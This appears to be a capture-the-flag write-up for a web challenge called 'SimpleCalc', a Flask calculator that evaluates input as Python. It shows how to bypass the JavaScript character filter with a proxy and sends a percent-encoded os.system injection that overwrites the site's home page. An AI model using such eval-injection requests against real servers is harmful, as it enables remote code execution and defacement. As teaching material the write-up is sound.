# Outline

### Web 1: SimpleCalc

Hint:
> Everything should be made as simple as possible, but not simpler.

This is a simple web server (written in Python3 with Flask) that allows users to do simple math. Under the hood, this is an unbelievably stupid design, because it works by taking the input as normal python code and evaluating on the live server. To mitigate this, we can use an HTTP proxy like Burp.

We can use the normal interface (the website) to ask it what `1 + 1` is.

The website than makes the following request:
```
GET /mafs/1%20%2B%201 HTTP/1.1
Host: <url>

```

Note that instead of `1 + 1`, we say `1%20%2B%201`. This is the percent-encoded version, which makes it usable inside URLs. 

Crucially, we could also have just made that request ourselves using an HTTP proxy like Burp. 

Once we send this, the Flask server replies with a response containing more HTML, which is just shoved into an iframe, and that's about it.

We could try to ask it to evaluate some evil python code, such as the example below:
```python
os.system("echo '... some evil html ...' > index_view.html")
```

Here's an example of (evil?) HTML we could overwrite the home page with:
```xml
<h1 style="font-family: monospace;">
    get
    <span style="color: red;">HAX</span>
    you
    <i>absolute skid</i>
    !!!!
</h1>
```

However, because the python strings are in double quotes we can't use double quotes inside the HTML normally, we have to escape them (write `\"` instead of just `"`).

Here's the complete python snippet:
```python
os.system("echo '<h1 style=\"font-family: monospace;\">get <span style=\"color: red;\">HAX</span> you <i>absolute skid</i>!!!!</h1>' > index_view.html")
```

If we use the normal interface (the website), the JavaScript will block us because it contains characters other than letters, math operators, and spaces. The full list of allowed characters is described in the line:
```javascript
let chars_ok = "0123456789 +-*/%()";
```

However, we can bypass all of these checks if we use an HTTP proxy to talk to the server directly. Here's our evil request:
```
GET /mafs/os.system(%22echo%20'%3Ch1%20style%3D%5C%22font-family%3A%20monospace%3B%5C%22%3Eget%20%3Cspan%20style%3D%5C%22color%3A%20red%3B%5C%22%3EHAX%3C%2Fspan%3E%20you%20%3Ci%3Eabsolute%20skid%3C%2Fi%3E!!!!%3C%2Fh1%3E'%20%3E%20index_view.html%22) HTTP/1.1
Host: <url>

```

Again, the server requires percent-encoded data in the URL, so we need to encode the python code like so:
`os.system(%22echo%20'%3Ch1%20style%3D%5C%22font-family%3A%20monospace%3B%5C%22%3Eget%20%3Cspan%20style%3D%5C%22color%3A%20red%3B%5C%22%3EHAX%3C%2Fspan%3E%20you%20%3Ci%3Eabsolute%20skid%3C%2Fi%3E!!!!%3C%2Fh1%3E'%20%3E%20index_view.html%22)`

The malicious python code doesn't set up a backdoor or do anything particularly fancy, it just overwrites the HTML used for the home page. 
